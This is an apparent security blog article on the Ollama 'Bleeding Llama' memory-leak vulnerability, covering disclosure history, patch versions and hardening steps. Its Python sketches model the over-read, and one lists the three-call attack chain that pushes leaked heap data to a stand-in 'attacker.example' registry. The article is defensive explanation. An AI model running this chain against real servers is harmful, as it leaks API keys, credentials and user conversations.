Bleeding Llama (CVE-2026-7482): Critical Ollama Vulnerability Leaks Your Entire Server Memory
What Is Bleeding Llama?
If you run Ollama — the most popular open-source platform for running large language models locally — your server may be silently leaking everything in its memory to anyone who knows how to ask.
A critical vulnerability tracked as CVE-2026-7482 and nicknamed "Bleeding Llama" by cybersecurity firm Cyera allows unauthenticated attackers to extract the entire process memory of an Ollama server. API keys, system prompts, user conversations, environment variables, database credentials — all of it. The attack requires just three HTTP API calls and produces zero errors, zero crashes, and zero log entries.
With a CVSS severity score of 9.1, Bleeding Llama ranks among the most dangerous vulnerabilities discovered in AI infrastructure in 2026. Roughly 300,000 Ollama servers are exposed on the public internet right now, and many operators still don't know they're vulnerable.
Who Found It
The vulnerability was discovered by Dor Attias, a security researcher at Cyera. Cyera is a data security company focused on AI and cloud infrastructure. Attias reported the vulnerability to Ollama on February 2, 2026, and spent nearly three months navigating a difficult disclosure process before the CVE was finally assigned.
How Ollama Normally Works
To understand the vulnerability, you need to know how Ollama handles model files. Ollama uses a file format called GGUF (GPT-Generated Unified Format) to store AI models. A GGUF file contains tensors — large arrays of numerical data that make up the model's weights — along with metadata that describes the size and shape of each tensor.
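A GGUF file's header makes this concrete. The following Python sketch packs and parses a simplified header (the real format adds metadata key/value pairs and per-tensor info records; consult the GGUF specification for the full layout):

```python
import struct

# Simplified GGUF header: magic, version, tensor count, metadata KV count.
# The real format continues with KV pairs and tensor info records.
def pack_gguf_header(tensor_count: int, kv_count: int) -> bytes:
    magic = b"GGUF"                          # 4-byte file magic
    return (magic
            + struct.pack("<I", 3)           # GGUF version 3, little-endian
            + struct.pack("<Q", tensor_count)
            + struct.pack("<Q", kv_count))

def parse_gguf_header(data: bytes):
    magic = data[:4]
    version, = struct.unpack_from("<I", data, 4)
    tensor_count, = struct.unpack_from("<Q", data, 8)
    kv_count, = struct.unpack_from("<Q", data, 16)
    return magic, version, tensor_count, kv_count

hdr = pack_gguf_header(tensor_count=1, kv_count=0)
print(parse_gguf_header(hdr))  # (b'GGUF', 3, 1, 0)
```

The point to notice: the tensor shapes live in metadata that the file's author fully controls, separate from the tensor data itself.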
When you create a model in Ollama, there are two main paths. You can pull a model from the Ollama registry using /api/pull, or you can upload your own GGUF file and create a model from it using /api/create. The second path is where the vulnerability lives.
During model creation, if quantization is needed (converting tensor data between formats like F32 and F16), Ollama reads each tensor from the file based on the size declared in the GGUF metadata — not the actual file size. The critical path runs through WriteTo() in fs/ggml/gguf.go and server/quantization.go, which use Go's unsafe package to bypass memory safety guarantees.
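The bug class is easy to model in miniature. This Python sketch is not Ollama's code; it simulates a reader that trusts a declared element count instead of the bytes actually present. (In Go with unsafe, the equivalent over-read walks into live heap memory; Python slicing merely truncates, so the "heap" here is simulated as adjacent bytes in one buffer.)

```python
import struct

def quantize_trusting_metadata(buf: memoryview, offset: int,
                               declared_elements: int) -> bytes:
    # BUG: reads declared_elements * 4 bytes (F32) starting at the tensor,
    # with no check against the real payload length.
    return bytes(buf[offset:offset + declared_elements * 4])

# Simulated process memory: a 16-byte tensor payload followed by
# unrelated "heap" data (a secret).
tensor = struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)   # 4 real F32 elements
heap = tensor + b"AWS_SECRET_KEY=hunter2"          # adjacent heap bytes

# Metadata claims 9 elements (36 bytes), so the read runs past the tensor.
leaked = quantize_trusting_metadata(memoryview(heap), 0, declared_elements=9)
print(b"AWS_SECRET_KEY" in leaked)  # True: the over-read pulled in the secret
```

The fix is the obvious bounds check: refuse to read more bytes than the file actually supplies for that tensor.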
How the Attack Works
The attack is a three-step process that exploits the gap between what a GGUF file claims to contain and what it actually contains.
Step 1: Upload the Crafted GGUF File
The attacker creates a tiny GGUF file — perhaps just a few kilobytes. But inside the file's metadata, the tensor shape is declared as something enormous — say, 1 million elements. The attacker uploads this file to the target Ollama server via /api/blobs/sha256:<digest>. This is a simple HTTP PUT request. No authentication is required — Ollama's API endpoints ship with zero auth in the upstream distribution.
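The size mismatch at the heart of step 1 can be quantified in a few lines of Python. The payload and digest here are illustrative, not a working exploit:

```python
import hashlib

# Hypothetical attacker file: a few KB of real data, but metadata
# declaring 1,000,000 F32 elements for a tensor.
DECLARED_ELEMENTS = 1_000_000
real_payload = b"\x00" * 4096            # what the file actually contains

declared_bytes = DECLARED_ELEMENTS * 4   # what the parser will try to read
print(declared_bytes - len(real_payload))  # 3995904 bytes read past the file

# Blobs are uploaded addressed by content digest:
digest = hashlib.sha256(real_payload).hexdigest()
print(f"PUT /api/blobs/sha256:{digest}")
```

Nearly 4 MB of whatever sits after the file's data in memory ends up treated as tensor content.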
Step 2: Trigger the Memory Bleed
The attacker calls /api/create with the quantize parameter set, referencing the uploaded blob. Ollama parses the GGUF file, sees the declared tensor shape of 1 million elements, and begins reading that many elements from memory during quantization. The actual file data ends after a few kilobytes, but Ollama keeps reading — straight into heap memory.
The heap is where Ollama stores everything during runtime: environment variables containing API keys and cloud credentials, system prompts you've configured, user conversations happening concurrently, any secrets loaded from .env files or passed as environment variables. All of this data gets read into the output buffer and baked into the resulting "model" artifact.
Step 3: Exfiltrate Everything
The attacker sets the model name to a domain they control. Then they call /api/push — Ollama's built-in model push feature — which sends the newly created "model" (now containing leaked heap data embedded in its tensor weights) to the attacker's server. By reversing the quantization on their end, the attacker can read the raw heap data in plaintext.
Three API calls. No authentication at any step. No crash. No error log. Completely silent.
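The chain above can be sketched as three unsent HTTP requests. The hostnames, model name, and JSON field names below are hypothetical placeholders; only the endpoint paths come from the write-up:

```python
import json

TARGET = "victim.example:11434"     # hypothetical exposed Ollama server
ATTACKER = "attacker.example"       # registry domain the attacker controls
DIGEST = "sha256:" + "ab" * 32      # digest of the crafted GGUF blob

# The three unauthenticated calls, as (method, path, body) sketches.
attack_chain = [
    ("PUT", f"/api/blobs/{DIGEST}", b"<crafted GGUF bytes>"),
    ("POST", "/api/create", json.dumps({
        "model": f"{ATTACKER}/leak/model",  # name points at attacker registry
        "files": {"model.gguf": DIGEST},    # field names are illustrative
        "quantize": "q4_K_M",               # triggers the vulnerable path
    }).encode()),
    ("POST", "/api/push", json.dumps({
        "model": f"{ATTACKER}/leak/model",  # push ships the leaked heap out
    }).encode()),
]

for method, path, _ in attack_chain:
    print(method, path)
```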
What Gets Leaked
The leaked heap memory can contain anything that the Ollama process has touched:
- API keys — OpenAI, Anthropic, cloud provider keys stored in environment variables
- Database credentials — connection strings, passwords
- System prompts — proprietary instructions you've configured for your models
- User conversations — prompts and responses from concurrent users
- Cloud secrets — AWS, GCP, Azure credentials passed as env vars
- Code and data — anything being processed by inference jobs
As Cyera's Dor Attias put it: "Through AI inference, an attacker can learn basically everything about an organization: API keys, proprietary code, customer contracts, and more."
Why "Localhost" Doesn't Save You
The default Ollama configuration binds to 127.0.0.1, which means only the local machine can access it. But in practice, many real-world deployments are exposed:
- OLLAMA_HOST=0.0.0.0 — A very common configuration for accessing Ollama from another device on the network. Without a firewall, this exposes the API to the entire internet.
- Docker port binding — Running Ollama with -p 11434:11434 defaults to 0.0.0.0, silently exposing the API beyond localhost.
- Cloudflare Tunnel / ngrok — If you expose Ollama through a tunnel without authentication policies, anyone with the URL can hit the API directly.
- Same-network attacks — On shared WiFi (offices, co-working spaces), anyone on the same network can reach an Ollama instance bound to 0.0.0.0.
- Browser-based SSRF — Even on localhost, a malicious website's JavaScript can make requests to 127.0.0.1:11434, since Ollama has no CORS protection.
Scans have found approximately 300,000 internet-facing Ollama deployments — these are real configurations real people use every day.
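A quick way to audit your own exposure is to test whether the Ollama port answers from a given vantage point. A minimal Python sketch:

```python
import socket

def ollama_port_open(host: str, port: int = 11434,
                     timeout: float = 2.0) -> bool:
    # Reachability check: can we open a TCP connection to the
    # Ollama API port from this machine?
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Run this from OUTSIDE your network to see what the internet sees, e.g.:
# print(ollama_port_open("your.public.ip"))
```

A TCP connect only proves the port answers; follow up with an authenticated-vs-unauthenticated request to confirm what the listener actually is.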
The Disclosure Mess
The timeline of this vulnerability's disclosure reveals systemic problems in how AI infrastructure security gets handled.
- February 2, 2026 — Dor Attias at Cyera reports the vulnerability to Ollama.
- February 13, 2026 — Researcher follows up requesting acknowledgement.
- February 25, 2026 — Ollama acknowledges the vulnerability and shares a fix via a PR. The researcher confirms the fix is valid.
- February 25, 2026 — Ollama asks the researcher to submit the CVE independently, rather than handling it themselves.
- February 26, 2026 — The researcher warns Ollama that releasing a fix without explicitly flagging it as a security patch will leave operators unaware of the urgency. Proposes GitHub Security Advisories as a faster alternative.
- February 28, 2026 — Researcher follows up requesting a status update. No response.
- March 2, 2026 — CVE request submitted to MITRE. No response.
- March 26, 2026 — Follow-up sent to MITRE. Still no response.
- April 26, 2026 — With no resolution from MITRE, the researcher approaches Echo, a third-party CVE Numbering Authority.
- April 28, 2026 — Echo assigns CVE-2026-7482 and reports Ollama for visibility.
- May 1, 2026 — CVE is published.
The patch shipped in Ollama v0.17.1 on February 25, but the release notes never flagged it as a security fix. For nearly three months, the fix existed but operators had no CVE, no scanner alert, and no release note telling them to urgently update. Without a CVE number, the vulnerability was invisible to every patch management tool and security scanner in the industry.
This is a pattern: open-source AI projects shipping silent security fixes, leaving the security communication burden on the researcher who found the problem.
Bonus: Two More Unpatched Ollama Vulnerabilities
As if Bleeding Llama wasn't enough, researchers at Striga separately disclosed two additional vulnerabilities in Ollama's Windows auto-update mechanism — CVE-2026-42248 (missing signature verification, CVSS 7.7) and CVE-2026-42249 (path traversal in the update process, CVSS 7.7). When chained together, these allow an attacker to achieve persistent code execution on victim machines at every login. Both remain unpatched as of May 2026, despite the 90-day responsible disclosure period having expired.
How to Check If You're Vulnerable
Open your terminal and run:
ollama --version
If the output shows 0.17.1 or higher, you're patched for Bleeding Llama. Anything below that means you're vulnerable — update immediately.
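If you manage many hosts, the comparison can be scripted. A small Python sketch; the exact output format of ollama --version is an assumption here, so adjust the parsing to what your build prints:

```python
def vulnerable_to_bleeding_llama(version_output: str) -> bool:
    # Take the last whitespace-separated token (handles strings like
    # "ollama version is 0.17.1") and compare numerically.
    nums = tuple(int(p) for p in version_output.strip().split()[-1].split("."))
    return nums < (0, 17, 1)   # anything below 0.17.1 is unpatched

print(vulnerable_to_bleeding_llama("0.16.3"))   # True
print(vulnerable_to_bleeding_llama("0.17.1"))   # False
```

Numeric tuple comparison avoids the classic string-comparison trap where "0.9.0" sorts above "0.17.1".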
Update Commands
- macOS (Homebrew): brew upgrade ollama
- Linux: curl -fsSL https://ollama.com/install.sh | sh
- Docker: docker pull ollama/ollama
How to Protect Yourself
- Update to v0.17.1 or later — This is non-negotiable. Do it now.
- Check your OLLAMA_HOST setting — If it's set to 0.0.0.0, ask yourself why. If you don't need remote access, set it back to 127.0.0.1.
- Add an authentication proxy — If you need remote access, put Nginx, Caddy, or another reverse proxy in front with authentication. Ollama's REST API has zero built-in auth.
- Set up access policies — If you use Cloudflare Tunnel, configure Access policies with zero trust. If you use ngrok, enable basic auth at minimum.
- Rotate compromised secrets — If your Ollama instance was exposed before patching, assume your secrets are compromised. Rotate all API keys, tokens, and credentials that were in your environment variables.
- Treat Ollama like a database — You would never put a database on the public internet without authentication. Apply the same principle to your AI inference server.
- Audit network exposure — Run a quick scan to check if any of your Ollama instances are reachable from the internet. Tools like runZero can help identify exposed assets.
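To illustrate the authentication-proxy idea, here is a deliberately minimal Python sketch of a bearer-token gate in front of a local Ollama instance. This is a toy for illustration only; in production, use Nginx, Caddy, or your provider's access controls:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.request import Request, urlopen

UPSTREAM = "http://127.0.0.1:11434"   # local Ollama, never exposed directly
API_TOKEN = "change-me"               # placeholder; load from a secret store

def authorized(auth_header: Optional[str]) -> bool:
    # Constant token check; real deployments should use per-user credentials.
    return auth_header == f"Bearer {API_TOKEN}"

class AuthProxy(BaseHTTPRequestHandler):
    def do_GET(self):
        if not authorized(self.headers.get("Authorization")):
            self.send_response(401)
            self.end_headers()
            return
        # Forward the request to Ollama and relay the response body.
        with urlopen(Request(UPSTREAM + self.path)) as resp:
            body = resp.read()
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)

# To run: HTTPServer(("0.0.0.0", 8080), AuthProxy).serve_forever()
```

The sketch handles only GET and relays nothing but the response body; a real proxy must forward methods, headers, and streaming responses as well.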
The Bigger Picture
Bleeding Llama is not an isolated incident. It's part of a growing pattern: AI infrastructure tools built for developer convenience with security as an afterthought. Ollama has 170,000+ GitHub stars and 100 million Docker Hub downloads. It has become critical infrastructure for thousands of organizations running local AI inference. But its API ships with no authentication, its GGUF parser trusted attacker-controlled metadata without bounds checking, and its security patch was released silently without any advisory.
As local LLM adoption continues to accelerate, every operator running self-hosted inference needs to treat these platforms with the same security discipline they'd apply to any production database or API gateway. The convenience of ollama run llama3 shouldn't mean accepting that your API keys are one crafted file away from exfiltration.